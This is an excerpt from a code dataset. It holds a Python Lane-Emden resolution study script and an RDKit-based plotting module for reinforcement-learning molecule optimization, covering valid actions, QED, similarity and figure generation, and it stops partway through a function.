current.next\n\n\n","repo_name":"alejandro-mr/data-structures-practice","sub_path":"python/linked_list/singly_linked_list/SinglyLinkedList.py","file_name":"SinglyLinkedList.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"41471649228","text":"#!/usr/bin/env python3\n#==============================================================================\n# resolution_study.py\n#\n# Compute and save the absolute differences of the polytropic parameters ξ₁ and\n# θₙ'(ξ₁) of the Lane--Emden equataion with their analytic solutions given by \n# Hansen, Kawaler & Trimble (2004, Table 7.1).\n#\n# Author: Stanley A. 
Baronett\n# Created: 2022-12-08\n# Updated: 2022-12-09\n#==============================================================================\nimport numpy as np\nimport shooting_method as sm\nimport sys\n\nns = np.asarray([0, 1]) # polytropic indices\nh_min, h_max, num = 1e-6, 1e-2, 200\nhs = np.geomspace(h_min, h_max, num=num) # range of step sizes\nanalytics = [[np.sqrt(6), -np.sqrt(6)/3], # analytic solutions\n [np.pi, -1/np.pi ]]\ndxs = np.zeros((len(ns), num)) # to store δξ₁\ndzs = np.zeros((len(ns), num)) # to store δθₙ'(ξ₁)\n\nprint(\"Computing and storing δξ₁ and δθₙ'(ξ₁) for...\", flush=True)\nfor i, n in enumerate(ns):\n xs, zs = np.zeros(num), np.zeros(num) # to store ξ₁ and θₙ'(ξ₁)\n\n print(f' n = {n}...', flush=True)\n\n for j, h in enumerate(hs):\n x = 1e-16 # ξ\n y = sm.yfunc(x, n) # θₙ\n z = sm.zfunc(x, n) # θₙ' = dθₙ/dξ = dy/dx\n\n while y.real > 0:\n x, y, z = sm.rk4(n, x, y, z, h)\n \n xs[j], zs[j] = x, z.real\n sys.stdout.write(f'\\r {(j+1)/hs.size:.1%}')\n\n dxs[i][:] = np.abs(np.asarray(xs) - analytics[i][0])\n dzs[i][:] = np.abs(np.asarray(zs) - analytics[i][1])\n print(' Done.', flush=True)\n\nprint(\"Saving results for plotting in 'fig1.py'...\", flush=True)\nnp.savez_compressed('../npz/resolution_study', ns=ns, hs=hs, dxs=dxs, dzs=dzs)\nprint('Finished.', flush=True)\n","repo_name":"sabaronett/ast-731","sub_path":"py/resolution_study.py","file_name":"resolution_study.py","file_ext":"py","file_size_in_byte":1980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"31646055762","text":"import matplotlib as mpl\nmpl.rcParams['font.sans-serif'] = [\n 'Roboto Condensed', 'Roboto Condensed Regular'\n]\n\nimport seaborn as sns\nimport math\nimport rdkit\nimport itertools\nfrom rdkit import Chem, DataStructs\nfrom rdkit.Chem import rdDepictor\nfrom rdkit.Chem.Draw import rdMolDraw2D\nfrom rdkit.Chem import AllChem, Draw, Descriptors, QED\nimport json\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nfrom scipy.optimize import leastsq\nfrom scipy import interpolate\nimport cairosvg as cs\n\n\ndef get_valid_actions(state, atom_types, allow_removal, allow_no_modification,\n allowed_ring_sizes, allow_bonds_between_rings):\n \"\"\"Computes the set of valid actions for a given state.\n\n Args:\n state: String SMILES; the current state. If None or the empty string, we\n assume an \"empty\" state with no atoms or bonds.\n atom_types: Set of string atom types, e.g. 
{'C', 'O'}.\n allow_removal: Boolean whether to allow actions that remove atoms and bonds.\n allow_no_modification: Boolean whether to include a \"no-op\" action.\n allowed_ring_sizes: Set of integer allowed ring sizes; used to remove some\n actions that would create rings with disallowed sizes.\n allow_bonds_between_rings: Boolean whether to allow actions that add bonds\n between atoms that are both in rings.\n\n Returns:\n Set of RDKit Mol containing the valid actions (technically, the set of\n all states that are acceptable from the given state).\n\n Raises:\n ValueError: If state does not represent a valid molecule.\n \"\"\"\n if not state:\n # Available actions are adding a node of each type.\n return copy.deepcopy(atom_types)\n mol = Chem.MolFromSmiles(state)\n if mol is None:\n raise ValueError('Received invalid state: %s' % state)\n # atom_valences = dict(\n # #zip(sorted(atom_types), molecules.atom_valences(sorted(atom_types))))\n # zip(sorted(atom_types), molecules_py.atom_valences(sorted(atom_types))))\n atom_valences = {'C': 4, 'H': 1, 'O': 2, 'N': 3}\n atoms_with_free_valence = {\n i: [\n atom.GetIdx()\n for atom in mol.GetAtoms()\n # Only atoms that allow us to replace at least one H with a new bond\n # are enumerated here.\n if atom.GetNumImplicitHs() >= i\n ] for i in range(1, max(atom_valences.values()))\n }\n valid_actions = set()\n valid_actions.update(\n _atom_addition(\n mol,\n atom_types=atom_types,\n atom_valences=atom_valences,\n atoms_with_free_valence=atoms_with_free_valence))\n valid_actions.update(\n _bond_addition(\n mol,\n atoms_with_free_valence=atoms_with_free_valence,\n allowed_ring_sizes=allowed_ring_sizes,\n allow_bonds_between_rings=allow_bonds_between_rings))\n if allow_removal:\n valid_actions.update(_bond_removal(mol))\n if allow_no_modification:\n #valid_actions.add(Chem.MolToSmiles(mol))\n valid_actions.add(Chem.Mol(mol))\n return valid_actions\n\n\ndef _atom_addition(state, atom_types, atom_valences, atoms_with_free_valence):\n \"\"\"Computes valid actions that involve adding atoms to the graph.\n\n Actions:\n * Add atom (with a bond connecting it to the existing graph)\n\n Each added atom is connected to the graph by a bond. There is a separate\n action for connecting to (a) each existing atom with (b) each valence-allowed\n bond type. Note that the connecting bond is only of type single, double, or\n triple (no aromatic bonds are added).\n\n For example, if an existing carbon atom has two empty valence positions and\n the available atom types are {'C', 'O'}, this section will produce new states\n where the existing carbon is connected to (1) another carbon by a double bond,\n (2) another carbon by a single bond, (3) an oxygen by a double bond, and\n (4) an oxygen by a single bond.\n\n Args:\n state: RDKit Mol.\n atom_types: Set of string atoms.\n atom_valences: Dict mapping string atom types to integer valences.\n atoms_with_free_valence: Dict mapping integer minimum available valence\n values to lists of integer atom indices. 
For instance, all atom indices in\n atoms_with_free_valence[2] have at least two available valence positions.\n\n Returns:\n Set of RDKit Mol; the available actions.\n \"\"\"\n bond_order = {\n 1: Chem.BondType.SINGLE,\n 2: Chem.BondType.DOUBLE,\n 3: Chem.BondType.TRIPLE,\n }\n atom_addition = set()\n for i in range(1, max(atom_valences.values())):\n if i not in bond_order:\n continue # Skip valences that are too high.\n for atom in atoms_with_free_valence[i]:\n for element in atom_types:\n if atom_valences[element] >= i:\n new_state = Chem.RWMol(state)\n idx = new_state.AddAtom(Chem.Atom(element))\n new_state.AddBond(atom, idx, bond_order[i])\n sanitization_result = Chem.SanitizeMol(new_state, catchErrors=True)\n if sanitization_result:\n continue # Skip the molecule when sanitization fails.\n #atom_addition.add(Chem.MolToSmiles(new_state))\n atom_addition.add(new_state)\n return atom_addition\n\n\ndef _bond_addition(state, atoms_with_free_valence, allowed_ring_sizes,\n allow_bonds_between_rings):\n \"\"\"Computes valid actions that involve adding bonds to the graph.\n\n Actions (where allowed):\n * None->{single,double,triple}\n * single->{double,triple}\n * double->{triple}\n\n Note that aromatic bonds are not modified.\n\n Args:\n state: RDKit Mol.\n atoms_with_free_valence: Dict mapping integer minimum available valence\n values to lists of integer atom indices. For instance, all atom indices in\n atoms_with_free_valence[2] have at least two available valence positions.\n allowed_ring_sizes: Set of integer allowed ring sizes; used to remove some\n actions that would create rings with disallowed sizes.\n allow_bonds_between_rings: Boolean whether to allow actions that add bonds\n between atoms that are both in rings.\n\n Returns:\n Set of RDKit Mol; the available actions.\n \"\"\"\n bond_orders = [\n None,\n Chem.BondType.SINGLE,\n Chem.BondType.DOUBLE,\n Chem.BondType.TRIPLE,\n ]\n bond_addition = set()\n for valence, atoms in atoms_with_free_valence.items():\n if valence > 3:\n continue # Skip valences that are too high.\n for atom1, atom2 in itertools.combinations(atoms, 2):\n # Get the bond from a copy of the molecule so that SetBondType() doesn't\n # modify the original state.\n bond = Chem.Mol(state).GetBondBetweenAtoms(atom1, atom2)\n new_state = Chem.RWMol(state)\n # Kekulize the new state to avoid sanitization errors; note that bonds\n # that are aromatic in the original state are not modified (this is\n # enforced by getting the bond from the original state with\n # GetBondBetweenAtoms()).\n Chem.Kekulize(new_state, clearAromaticFlags=True)\n if bond is not None:\n if bond.GetBondType() not in bond_orders:\n continue # Skip aromatic bonds.\n idx = bond.GetIdx()\n # Compute the new bond order as an offset from the current bond order.\n bond_order = bond_orders.index(bond.GetBondType())\n bond_order += valence\n if bond_order < len(bond_orders):\n idx = bond.GetIdx()\n bond.SetBondType(bond_orders[bond_order])\n new_state.ReplaceBond(idx, bond)\n else:\n continue\n # If do not allow new bonds between atoms already in rings.\n elif (not allow_bonds_between_rings and\n (state.GetAtomWithIdx(atom1).IsInRing() and\n state.GetAtomWithIdx(atom2).IsInRing())):\n continue\n # If the distance between the current two atoms is not in the\n # allowed ring sizes\n elif (allowed_ring_sizes is not None and\n len(Chem.rdmolops.GetShortestPath(\n state, atom1, atom2)) not in allowed_ring_sizes):\n continue\n else:\n new_state.AddBond(atom1, atom2, bond_orders[valence])\n sanitization_result = 
Chem.SanitizeMol(new_state, catchErrors=True)\n if sanitization_result:\n continue # Skip the molecule when sanitization fails.\n #bond_addition.add(Chem.MolToSmiles(new_state))\n bond_addition.add(new_state)\n return bond_addition\n\n\ndef _bond_removal(state):\n \"\"\"Computes valid actions that involve removing bonds from the graph.\n\n Actions (where allowed):\n * triple->{double,single,None}\n * double->{single,None}\n * single->{None}\n\n Bonds are only removed (single->None) if the resulting graph has zero or one\n disconnected atom(s); the creation of multi-atom disconnected fragments is not\n allowed. Note that aromatic bonds are not modified.\n\n Args:\n state: RDKit Mol.\n\n Returns:\n Set of RDKit Mol; the available actions.\n \"\"\"\n bond_orders = [\n None,\n Chem.BondType.SINGLE,\n Chem.BondType.DOUBLE,\n Chem.BondType.TRIPLE,\n ]\n bond_removal = set()\n for valence in [1, 2, 3]:\n for bond in state.GetBonds():\n # Get the bond from a copy of the molecule so that SetBondType() doesn't\n # modify the original state.\n bond = Chem.Mol(state).GetBondBetweenAtoms(bond.GetBeginAtomIdx(),\n bond.GetEndAtomIdx())\n if bond.GetBondType() not in bond_orders:\n continue # Skip aromatic bonds.\n new_state = Chem.RWMol(state)\n # Kekulize the new state to avoid sanitization errors; note that bonds\n # that are aromatic in the original state are not modified (this is\n # enforced by getting the bond from the original state with\n # GetBondBetweenAtoms()).\n Chem.Kekulize(new_state, clearAromaticFlags=True)\n # Compute the new bond order as an offset from the current bond order.\n bond_order = bond_orders.index(bond.GetBondType())\n bond_order -= valence\n if bond_order > 0: # Downgrade this bond.\n idx = bond.GetIdx()\n bond.SetBondType(bond_orders[bond_order])\n new_state.ReplaceBond(idx, bond)\n sanitization_result = Chem.SanitizeMol(new_state, catchErrors=True)\n if sanitization_result:\n continue # Skip the molecule when sanitization fails.\n #bond_removal.add(Chem.MolToSmiles(new_state))\n bond_removal.add(new_state)\n elif bond_order == 0: # Remove this bond entirely.\n atom1 = bond.GetBeginAtom().GetIdx()\n atom2 = bond.GetEndAtom().GetIdx()\n new_state.RemoveBond(atom1, atom2)\n sanitization_result = Chem.SanitizeMol(new_state, catchErrors=True)\n if sanitization_result:\n continue # Skip the molecule when sanitization fails.\n smiles = Chem.MolToSmiles(new_state)\n parts = sorted(smiles.split('.'), key=len)\n # We define the valid bond removing action set as the actions\n # that remove an existing bond, generating only one independent\n # molecule, or a molecule and an atom.\n if len(parts) == 1 or len(parts[0]) == 1:\n #bond_removal.add(parts[-1])\n bond_removal.add(Chem.MolFromSmiles(parts[-1]))\n return bond_removal\n\n\ndef highlights_diff(original_mol, next_mol):\n highlight_atoms = []\n original_num_atoms = len(original_mol.GetAtoms())\n next_num_atoms = len(next_mol.GetAtoms())\n for i in range(min(original_num_atoms, next_num_atoms)):\n if original_mol.GetAtoms()[i].GetSymbol() != next_mol.GetAtoms(\n )[i].GetSymbol():\n highlight_atoms.append(next_mol.GetAtoms()[i].GetIdx())\n if next_num_atoms > original_num_atoms:\n highlight_atoms.extend(range(original_num_atoms, next_num_atoms))\n\n highlight_bonds = []\n original_num_bonds = len(original_mol.GetBonds())\n next_num_bonds = len(next_mol.GetBonds())\n for i in range(min(original_num_bonds, next_num_bonds)):\n if original_mol.GetBonds()[i].GetBondType() != next_mol.GetBonds(\n )[i].GetBondType():\n 
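      # Bond i differs in bond order between the original and candidate molecule;
      # its index is recorded here so the change can be highlighted when the
      # molecule grid is rendered later.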
highlight_bonds.append(next_mol.GetBonds()[i].GetIdx())\n if next_num_bonds > original_num_bonds:\n highlight_bonds.extend(range(original_num_bonds, next_num_bonds))\n return highlight_atoms, highlight_bonds\n\n\ndef tidy_smiles(smiles):\n new_smiles = {\n 'weight_0': list(set(smiles['weight_0'][-30:])),\n 'weight_1': list(set(smiles['weight_1'][-30:])),\n 'weight_2': list(set(smiles['weight_2'][-150:])),\n 'weight_3': list(set(smiles['weight_3'][-150:])),\n 'weight_4': list(set(smiles['weight_4'][-150:])),\n 'weight_5': list(set(smiles['weight_5'][-150:]))\n }\n return new_smiles\n\n\ndef get_properties(smiles, target_molecule='C1CCC2CCCCC2C1'):\n target_mol_fp = AllChem.GetMorganFingerprintAsBitVect(\n Chem.MolFromSmiles(target_molecule), radius=2, nBits=2048)\n mol = Chem.MolFromSmiles(smiles)\n if mol is None:\n return 0.0, 0.0\n fingerprint_structure = AllChem.GetMorganFingerprintAsBitVect(\n mol, radius=2, nBits=2048)\n sim = DataStructs.TanimotoSimilarity(target_mol_fp, fingerprint_structure)\n qed = QED.qed(mol)\n return sim, qed\n\n\ndef plot_multi_obj_opt(smiles, target_mol, idx=0):\n with open('all_molecules_with_id.json') as f:\n molid = json.load(f)\n colors = iter(cm.rainbow(np.linspace(0, 1, 6)))\n plt.figure()\n for i in range(6):\n ssl = smiles['weight_%i' % i]\n sim, qed = zip(\n *[get_properties(ss, target_molecule=target_mol) for ss in ssl])\n plt.scatter(sim, qed, label='w=%.1f' % (i * 0.2), color=next(colors))\n target_sim, target_qed = get_properties(target_mol, target_mol)\n plt.axvline(x=target_sim, ls='dashed', color='grey')\n plt.axhline(y=target_qed, ls='dashed', color='grey')\n leg = plt.legend()\n leg.get_frame().set_alpha(0.95)\n plt.ylim((-0.2, 1))\n plt.xlabel('Similarity')\n plt.ylabel('QED')\n plt.title(molid[target_mol])\n plt.subplots_adjust(left=0.16, bottom=0.16, right=0.92, top=0.88)\n plt.savefig('batch/mult_obj_gen_{}.pdf'.format(idx))\n #plt.show()\n\n\ndef plot_multi_obj_gen_drug20():\n with open('multi_obj_opt_drug20.json') as f:\n data = json.load(f)\n plot_multi_obj_opt_multi_plot(result['smiles'], result['target_mol'], 2)\n\n\ndef plot_qed_improvements():\n with open('qed_imp_2.json') as f:\n improvements = json.load(f)\n\n def double_gaussian(x, params):\n (c1, mu1, sigma1, c2, mu2, sigma2) = params\n res = c1 * np.exp( - (x - mu1)**2.0 / (2.0 * sigma1**2.0) ) \\\n + c2 * np.exp( - (x - mu2)**2.0 / (2.0 * sigma2**2.0) )\n return res\n\n def double_gaussian_fit(params, y):\n fit = double_gaussian(x, params)\n return (fit - y)\n\n colors = list(iter(cm.rainbow(np.linspace(0, 1, 6))))\n colors = ['#eae471', '#c1e092', '#83b49d', '#448fad', '#3e60c3', '#5a26a6']\n plt.figure()\n start = -0.4\n end = 0.6\n for i in range(6):\n imp = np.array(improvements['weight_%i' % i])\n y, binEdges = np.histogram(imp, bins=40, range=(start, end))\n y = y.astype(np.float64)\n y /= y.sum()\n x = 0.5 * (binEdges[1:] + binEdges[:-1])\n if i == 0:\n fit = leastsq(lambda x: double_gaussian_fit(x, y),\n [1, 0, 0.02, 1, 0.3, 0.1])\n elif i == 1:\n fit = leastsq(lambda x: double_gaussian_fit(x, y),\n [1, 0, 0.02, 1, 0.1, 0.1])\n else:\n fit = leastsq(lambda x: double_gaussian_fit(x, y),\n [1, 0, 0.02, 1, 0.1, 0.05])\n xx = np.linspace(start, end, 300)\n yy = double_gaussian(xx, fit[0])\n\n plt.plot(x, y, 'o', color=colors[i], alpha=0.3)\n plt.plot(\n xx,\n yy,\n color=colors[i],\n label='w=%.1f' % (i * 0.2),\n )\n plt.xlim(start, end)\n # plt.ylim(-0.02, 0.2)\n\n plt.legend()\n plt.xlabel('Improvements on QED')\n plt.ylabel('Normalized count')\n 
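  # Each weight's histogram of QED improvements above is summarized with a
  # two-component Gaussian fit (leastsq on double_gaussian); the margins are
  # tightened below before the figure is written to qed_improvements.pdf.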
plt.subplots_adjust(left=0.16, bottom=0.16, right=0.92, top=0.92)\n plt.savefig('qed_improvements.pdf')\n plt.show()\n\n\ndef plot_qed_relative_improvements():\n with open('qed_rel_imp_2.json') as f:\n improvements = json.load(f)\n\n def double_gaussian(x, params):\n (c1, mu1, sigma1, c2, mu2, sigma2) = params\n res = c1 * np.exp( - (x - mu1)**2.0 / (2.0 * sigma1**2.0) ) \\\n + c2 * np.exp( - (x - mu2)**2.0 / (2.0 * sigma2**2.0) )\n return res\n\n def double_gaussian_fit(params, y):\n fit = double_gaussian(x, params)\n return (fit - y)\n\n colors = list(iter(cm.rainbow(np.linspace(0, 1, 6))))\n colors = ['#eae471', '#c1e092', '#83b49d', '#448fad', '#3e60c3', '#5a26a6']\n plt.figure()\n start = -1\n end = 1\n for i in range(6):\n imp = np.array(improvements['weight_%i' % i])\n y, binEdges = np.histogram(imp, bins=40, range=(start, end))\n y = y.astype(np.float64)\n y /= y.sum()\n x = 0.5 * (binEdges[1:] + binEdges[:-1])\n if i == 0:\n fit = leastsq(lambda x: double_gaussian_fit(x, y),\n [1, 0.5, 0.1, 1, 0.6, 0.1])\n elif i == 1:\n fit = leastsq(lambda x: double_gaussian_fit(x, y),\n [1, 0.2, 0.05, 1, 0.5, 0.1])\n else:\n fit = leastsq(lambda x: double_gaussian_fit(x, y),\n [1, 0, 0.1, 1, 0.4, 0.5])\n xx = np.linspace(start, end, 300)\n yy = double_gaussian(xx, fit[0])\n\n plt.plot(x, y, 'o', color=colors[i], alpha=0.3)\n plt.plot(\n xx,\n yy,\n color=colors[i],\n label='w=%.1f' % (i * 0.2),\n )\n plt.xlim(start, end)\n # plt.ylim(-0.02, 0.2)\n\n plt.legend()\n plt.xlabel('Relative improvements on QED')\n plt.ylabel('Normalized count')\n plt.subplots_adjust(left=0.16, bottom=0.16, right=0.92, top=0.92)\n plt.savefig('qed_rel_improvements.pdf')\n plt.show()\n\n\ndef plot_drug20_smiles():\n with open('drug_20_smiles.json') as f:\n data = json.load(f)\n smiles = sum(data.values(), [])\n mols = [Chem.MolFromSmiles(ss) for ss in smiles]\n target_mol = 'CN1C(=O)C2(OCCO2)c3ccccc13'\n template1 = Chem.MolFromSmiles('N1C(=O)C2(OCCO2)c3ccccc13')\n AllChem.Compute2DCoords(template1, canonOrient=True)\n\n properties = [\n 'SIM: %.3f\\nQED: %.3f' % get_properties(mol, target_mol) for mol in smiles\n ]\n # img = Draw.MolsToGridImage(mols, molsPerRow=5,\n # subImgSize=(300, 150), useSVG=True)\n # imgsize = (280, 100)\n # drawer = rdMolDraw2D.MolDraw2DSVG(imgsize[0] * 5, imgsize[1] * 6 + 20,\n # imgsize[0], imgsize[1])\n # drawer.SetFontSize(0.8) # <- default is 0.5, so this makes the font half\n # drawer.drawOptions().legendFontSize = 18\n # drawer.DrawMolecules(mols, legends=properties)\n # drawer.FinishDrawing()\n # img = drawer.GetDrawingText()\n #cs.svg2pdf(bytestring=img.encode('utf-8'), write_to='drug20_smiles.pdf')\n for i in range(4, 5):\n smiles = data[f'weight_{i}']\n mols = [Chem.MolFromSmiles(ss) for ss in smiles]\n for mol in mols:\n try:\n AllChem.GenerateDepictionMatching2DStructure(mol, template1)\n except:\n pass\n properties = [\n 'SIM: %.3f, QED: %.3f' % get_properties(mol, target_mol)\n for mol in smiles\n ]\n imgsize1 = [260, 340, 280, 280, 220, 220]\n imgsize = (240, imgsize1[i])\n drawer = rdMolDraw2D.MolDraw2DSVG(imgsize[0] * 5, imgsize[1] + 5,\n imgsize[0], imgsize[1])\n drawer.SetFontSize(0.8) # <- default is 0.5, so this makes the font half\n drawer.drawOptions().legendFontSize = 18\n drawer.DrawMolecules(mols, legends=properties)\n drawer.FinishDrawing()\n img = drawer.GetDrawingText()\n cs.svg2pdf(\n bytestring=img.encode('utf-8'), write_to=f'drug1_smiles_w{i}.pdf')\n\n\ndef plot_max_qed_mols_2():\n smiles = {\n 'CCC1C(=O)C(C)(Cc2cnc3[nH]c4c(n23)CCO4)CC1C': 
0.9480413389762415,\n 'CCC(C)C12C3=CC(=O)C1Cc1cc4nc(OC)[nH]c4c(c12)C3': 0.9477126732214856,\n 'CCCC1C(C)=NCC12COCC2n1cc2ocnc2c1O': 0.9469782135033733,\n 'C=Cc1nc(OC)[nH]c1-c1c(C)cc2c3c1CC(=O)C(CC2)O3': 0.9465532716678036,\n }\n mols = [Chem.MolFromSmiles(k) for k, v in smiles.items()][:4]\n properties = ['QED: %.3f' % v for k, v in smiles.items()]\n # img = Draw.MolsToGridImage(mols, molsPerRow=2, legends=properties,\n # subImgSize=(300, 200), useSVG=True)\n drawer = rdMolDraw2D.MolDraw2DSVG(600, 400, 300, 200)\n drawer.SetFontSize(0.8) # <- default is 0.5, so this makes the font half\n drawer.drawOptions().legendFontSize = 18\n drawer.DrawMolecules(mols, legends=properties)\n drawer.FinishDrawing()\n img = drawer.GetDrawingText()\n cs.svg2pdf(bytestring=img.encode('utf-8'), write_to='max_qed_mols_2.pdf')\n\n\ndef plot_max_logp_mols_2():\n logp = [11.7435, 11.7182, 11.7090, 11.7090]\n smiles = [\n 'C=C(CCCCCCCC=C(CCCCCC)CCCCC(C)=CCCCC)C(C)(C)CCCCCCC(C)C',\n 'C=C(CCCCC)CCCCCCC=C(CCCCCC=CCCC)CCCC(C)(C)CCCCCCC(C)C',\n 'C=C(CCCCC(C)=CCCCCCC)CCCC(CCCCCC(C)C)=C(C)CCCCCCCC(C)(C)C',\n 'C=C(CCCCC(C)=CCCCCCC)CCCC(CCCCCCCC(C)(C)C)=C(C)CCCCCC(C)C'\n ]\n mols = [Chem.MolFromSmiles(ss) for ss in smiles]\n properties = ['Penalized logP: %.2f' % v for v in logp]\n # img = Draw.MolsToGridImage(mols, molsPerRow=2, legends=properties,\n # subImgSize=(300, 200), useSVG=True)\n\n drawer = rdMolDraw2D.MolDraw2DSVG(600, 400, 300, 200)\n drawer.SetFontSize(0.8) # <- default is 0.5, so this makes the font half\n drawer.drawOptions().legendFontSize = 18\n drawer.DrawMolecules(mols, legends=properties)\n drawer.FinishDrawing()\n img = drawer.GetDrawingText()\n\n cs.svg2pdf(bytestring=img.encode('utf-8'), write_to='max_logp_mols_2.pdf')\n\n\ndef plot_max_logp_mols():\n logp = [11.7069205, 11.63197045, 11.6280874, 11.62077996]\n smiles = [\n 'CCCCCC=C(CCCC(CC)CC)CCC(C)(C)CCCCC(C)=CCCCCCCC(C)(C)CCCC',\n 'C=C(CCCCCCCC=CCC)CCC(=CCCCCC(C)(C)CCCCCCC(CC)CC)CCCCC',\n 'C=C(CCCCCC)CCCC(=CCCCCC(C)(C)CCCCCCC(CC)CC)CCCCC=CCCC',\n 'C=C(CCCCC(C)(C)CCCC(C)(CC)CC)CCC(=CCCCCCC(CC)CC)CCCCCCCC'\n ]\n mols = [Chem.MolFromSmiles(ss) for ss in smiles]\n properties = ['Penalized logP: %.2f' % v for v in logp]\n # img = Draw.MolsToGridImage(mols, molsPerRow=2, legends=properties,\n # subImgSize=(300, 200), useSVG=True)\n\n drawer = rdMolDraw2D.MolDraw2DSVG(600, 400, 300, 200)\n drawer.SetFontSize(0.8) # <- default is 0.5, so this makes the font half\n drawer.drawOptions().legendFontSize = 18\n drawer.DrawMolecules(mols, legends=properties)\n drawer.FinishDrawing()\n img = drawer.GetDrawingText()\n\n cs.svg2pdf(bytestring=img.encode('utf-8'), write_to='max_logp_mols.pdf')\n\n\ndef plot_noisy_qed_reward():\n colors = list(iter(cm.rainbow(np.linspace(0, 1, 4))))\n with open('noise.json') as f:\n all_qed = json.load(f)\n plt.figure()\n for i in range(4):\n qed = all_qed['robust_0.%i' % i]\n lq = len(qed)\n window = 200\n\n x = [j * 200 for j in range(lq // window - 1)]\n y = [\n np.mean(qed[window * j:window * (j + 1)])\n for j in range(lq // window - 1)\n ]\n fit = interpolate.UnivariateSpline(x, y, k=3)\n xx = np.linspace(0, 5000, 100)\n plt.plot(x, y, '-', alpha=0.2, color=colors[i])\n plt.plot(xx, fit(xx), label='robust, $\\sigma$=0.%i' % i, color=colors[i])\n\n qed = all_qed['l2_0.%i' % i]\n lq = len(qed)\n window = 200\n\n x = [j * 200 for j in range(lq // window - 1)]\n y = [\n np.mean(qed[window * j:window * (j + 1)])\n for j in range(lq // window - 1)\n ]\n fit = interpolate.UnivariateSpline(x, y, k=3)\n xx = np.linspace(0, 5000, 100)\n 
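    # The windowed means (window of 200 entries) are drawn faintly and overlaid
    # with the cubic-spline fit for the 'robust' run; the dashed block below
    # repeats the same smoothing for the 'l2' baseline at the same noise level.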
plt.plot(x, y, ls='dashed', alpha=0.2, color=colors[i])\n plt.plot(\n xx,\n fit(xx),\n ls='dashed',\n label='l2, $\\sigma$=0.%i' % i,\n color=colors[i])\n\n plt.xlim(0, 4600)\n plt.ylim(0.2, 1)\n plt.xlabel('Number of epochs')\n plt.ylabel('Reward')\n plt.legend(loc='upper left')\n plt.subplots_adjust(left=0.16, bottom=0.16, right=0.92, top=0.92)\n plt.savefig('noisy_reward.pdf')\n plt.show()\n\n\ndef plot_final_vs_intermediate_reward():\n with open('final_vs_interm_reward.json') as f:\n all_qed = json.load(f)\n plt.figure()\n qed = all_qed['intermediate_reward']\n lq = len(qed)\n window = 200\n\n x = [j * window + 1 for j in range(lq // window - 1)]\n y = [\n np.mean(qed[window * j:window * (j + 1)]) for j in range(lq // window - 1)\n ]\n fit = interpolate.UnivariateSpline(\n x,\n y,\n k=3,\n )\n xx = np.linspace(0, 5000, 100)\n plt.plot(x, y, 'o', color='C0', alpha=0.2)\n plt.plot(xx, fit(xx), label='intermediate reward')\n\n qed = all_qed['final_reward']\n lq = len(qed)\n window = 200\n x = [j * window + 1 for j in range(lq // window - 1)]\n y = [\n np.mean(qed[window * j:window * (j + 1)]) for j in range(lq // window - 1)\n ]\n fit = interpolate.UnivariateSpline(\n x,\n y,\n k=3,\n )\n xx = np.linspace(0, 5000, 100)\n plt.plot(x, y, 'o', color='C1', alpha=0.2)\n plt.plot(xx, fit(xx), label='final reward')\n\n plt.xlim(0, 4600)\n plt.ylim(0.2, 0.8)\n plt.xlabel('Number of epochs')\n plt.ylabel('Reward')\n plt.legend(loc='upper left')\n plt.subplots_adjust(left=0.16, bottom=0.16, right=0.92, top=0.92)\n plt.savefig('final_vs_intermediate_reward.pdf')\n plt.show()\n\n\ndef plot_qvals_with_change_20():\n highlightcolor = (0.98, 0.85, 0.37)\n\n with open('q_values_20.json') as f:\n qvals = json.load(f)\n\n original_smiles = 'CN1C(=O)C2(OCCO2)c2ccccc21'\n original_state = Chem.MolFromSmiles(original_smiles)\n original_state2 = Chem.MolFromSmiles(original_smiles)\n\n next_states = list(\n get_valid_actions(\n state=original_smiles,\n atom_types={'C', 'N', 'O'},\n allow_removal=False,\n allow_no_modification=True,\n allowed_ring_sizes={3, 5, 6},\n allow_bonds_between_rings=False))\n\n bond_removal_actions = [\n Chem.MolToSmiles(ss) for ss in _bond_removal(original_state2)\n ]\n # bond_removal_actions = {}\n stated = {Chem.MolToSmiles(s): s for s in next_states}\n mols = []\n ha = []\n hb = []\n hac = []\n hbc = []\n prop = []\n for k, v in sorted(qvals.items(), key=lambda x: -x[1]):\n if k in stated or k in bond_removal_actions:\n if k in stated:\n mol = stated[k]\n mols.append(mol)\n hla, hlb = highlights_diff(original_state, mol)\n ha.append(hla)\n hb.append(hlb)\n hac.append({a: highlightcolor for a in hla})\n hbc.append({b: highlightcolor for b in hlb})\n else:\n mols.append(Chem.MolFromSmiles(k))\n ha.append([])\n hb.append([])\n hac.append({})\n hbc.append({})\n prop.append('%.4f' % v)\n\n # img = Draw.MolsToGridImage(mols, molsPerRow=5,\n # subImgSize=(300, 150),\n # legends=prop,\n # highlightAtomLists=ha,\n # highlightBondLists=hb,\n # highlightAtomColors=hac,\n # highlightBondColors=hbc,\n # useSVG=True)\n\n nmols = len(mols)\n ncols = 5\n nrows = math.ceil(float(nmols) / ncols)\n drawer = rdMolDraw2D.MolDraw2DSVG(ncols * 220, nrows * 180 + 20, 220, 180)\n drawer.SetFontSize(0.75) # <- default is 0.5, so this makes the font half\n drawer.drawOptions().legendFontSize = 20\n drawer.DrawMolecules(\n mols,\n legends=prop,\n highlightAtoms=ha,\n highlightBonds=hb,\n highlightAtomColors=hac,\n highlightBondColors=hbc)\n drawer.FinishDrawing()\n img = drawer.GetDrawingText()\n 
